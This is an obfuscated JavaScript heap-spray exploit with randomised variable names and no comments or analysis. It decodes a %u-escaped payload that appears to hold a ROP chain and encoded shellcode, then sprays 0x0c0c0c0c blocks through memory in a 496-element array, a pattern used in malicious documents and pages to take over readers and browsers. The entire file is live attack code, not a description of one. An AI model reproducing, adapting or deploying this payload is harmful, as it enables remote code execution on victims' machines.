var pYOVITtMRgfhRuNLMYSRfGjwdLVsxBofJLGtAidBhfTAcCXJNoKcyBwyjANaAgLr = unescape
var WOsxAzrtzMLuPusinTRAraRoBErOMcvGz =
  pYOVITtMRgfhRuNLMYSRfGjwdLVsxBofJLGtAidBhfTAcCXJNoKcyBwyjANaAgLr(
    '%u0c0c%u0c0c%u2fe1%u0700%ucccc%ucccc%ucccc%ucccc%u0c1c%u0c0c%u4919%u0700%ucccc%ucccc%u48ef%u0700%u156f%u0700%ucccc%ucccc%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9033%u0700%u9084%u0700%u0c0c%u0c0c%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0c0c%u0c0c%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%ufab8%u2f78%ud962%ud9cd%u2474%u5bf4%uc929%u49b1%uc383%u3104%u1043%u4303%u1810%ud38d%u558a%u2c6e%u054b%uc9e6%u177a%u9a9c%ua72f%ucfd6%u4cc3%ufbba%u2050%u0b13%u8ed0%u2245%u3fe1%ue84a%u5e21%uf336%u8075%u3c07%uc188%u2140%u9363%u2d19%u03d6%u732d%u22eb%uffe1%u5c53%uc084%ud620%u1087%u6d98%u88cf%u2992%ua9f0%u2a77%ue0cc%u98fc%uf2a6%ud1d4%uc547%ubd18%ue979%ubc94%ucebe%ucb46%u2cb4%ucbfa%u4e0e%u5e20%ue893%uf8a3%u0877%u9e67%u06fc%ud5cc%u0b5b%u3ad3%u37d0%ubd58%ube37%u991a%u9a93%u80f9%u4682%ubdaf%u2fd5%u1b10%uc29d%u1d45%u8afc%u13aa%u4aff%u24a5%u788c%u9e6a%u311a%u38e3%u36dc%ufcde%uc972%ufce1%u0e5b%uacb5%ua7f3%u27b6%u4704%ue763%ue754%u47dc%u4705%u2f8d%u484f%u4ff2%u8270%ue59b%u458a%u5164%ud19e%ua30c%ud89f%u2a77%ub079%u7a97%u2dd1%u2701%ucca9%uf2ce%ucfd7%uf045%u8128%u7dad%u763b%uc85e%ud161%ue761%ude0c%u03f7%u8987%u096f%ufefe%uf22f%u74d5%u66f9%ue296%u6606%uf316%uec50%u9b16%u5404%ube45%u414a%u13f9%u69df%uc0a8%u0148%u3e56%u8ebe%u15a9%uf33e%u507f%u05c4%ub00a%u4104'
  )
var XrWSPQHcZlAycHrOz =
  pYOVITtMRgfhRuNLMYSRfGjwdLVsxBofJLGtAidBhfTAcCXJNoKcyBwyjANaAgLr(
    '%u0c0c%u0c0c'
  )
while (XrWSPQHcZlAycHrOz.length + 20 + 8 < 65536) {
  XrWSPQHcZlAycHrOz += XrWSPQHcZlAycHrOz
}
VbhPpOYpTecVGLIsETeJrnDdMLXceGUIiphdIysFCGVYKhtGlwLnfmVUUuJTGsUe =
  XrWSPQHcZlAycHrOz.substring(0, 1524)
VbhPpOYpTecVGLIsETeJrnDdMLXceGUIiphdIysFCGVYKhtGlwLnfmVUUuJTGsUe +=
  WOsxAzrtzMLuPusinTRAraRoBErOMcvGz
VbhPpOYpTecVGLIsETeJrnDdMLXceGUIiphdIysFCGVYKhtGlwLnfmVUUuJTGsUe +=
  XrWSPQHcZlAycHrOz
oCNzcTMjypOrbGIkxNkIRpahFCbdUatpShwhFRehCxmGDpJWYZBajKwstrabRbTJlYTacXcMPIVDqoojgcyYQwt =
  VbhPpOYpTecVGLIsETeJrnDdMLXceGUIiphdIysFCGVYKhtGlwLnfmVUUuJTGsUe.substring(
    0,
    32768
  )
while (
  oCNzcTMjypOrbGIkxNkIRpahFCbdUatpShwhFRehCxmGDpJWYZBajKwstrabRbTJlYTacXcMPIVDqoojgcyYQwt.length <
  524288
) {
  oCNzcTMjypOrbGIkxNkIRpahFCbdUatpShwhFRehCxmGDpJWYZBajKwstrabRbTJlYTacXcMPIVDqoojgcyYQwt +=
    oCNzcTMjypOrbGIkxNkIRpahFCbdUatpShwhFRehCxmGDpJWYZBajKwstrabRbTJlYTacXcMPIVDqoojgcyYQwt
}
xCqXMwIbyIRBbGbUkGwqvJcMlSrMQnTdSAPyUifBsAemOvINRgxbOxxoyzsMQePTpqbluwoGFZrA =
  oCNzcTMjypOrbGIkxNkIRpahFCbdUatpShwhFRehCxmGDpJWYZBajKwstrabRbTJlYTacXcMPIVDqoojgcyYQwt.substring(
    0,
    522228
  )
var lfswqhYCyhCkyWQaBCIOUDTviOATupEVlmDpfIEZHIXtqDAzEfuIOeWkgzrUebxA =
  new Array()
for (
  UWURbfqZVXQhlUrPBxk = 0;
  UWURbfqZVXQhlUrPBxk < 496;
  UWURbfqZVXQhlUrPBxk++
) {
  lfswqhYCyhCkyWQaBCIOUDTviOATupEVlmDpfIEZHIXtqDAzEfuIOeWkgzrUebxA[
    UWURbfqZVXQhlUrPBxk
  ] =
    xCqXMwIbyIRBbGbUkGwqvJcMlSrMQnTdSAPyUifBsAemOvINRgxbOxxoyzsMQePTpqbluwoGFZrA +
    's'
}
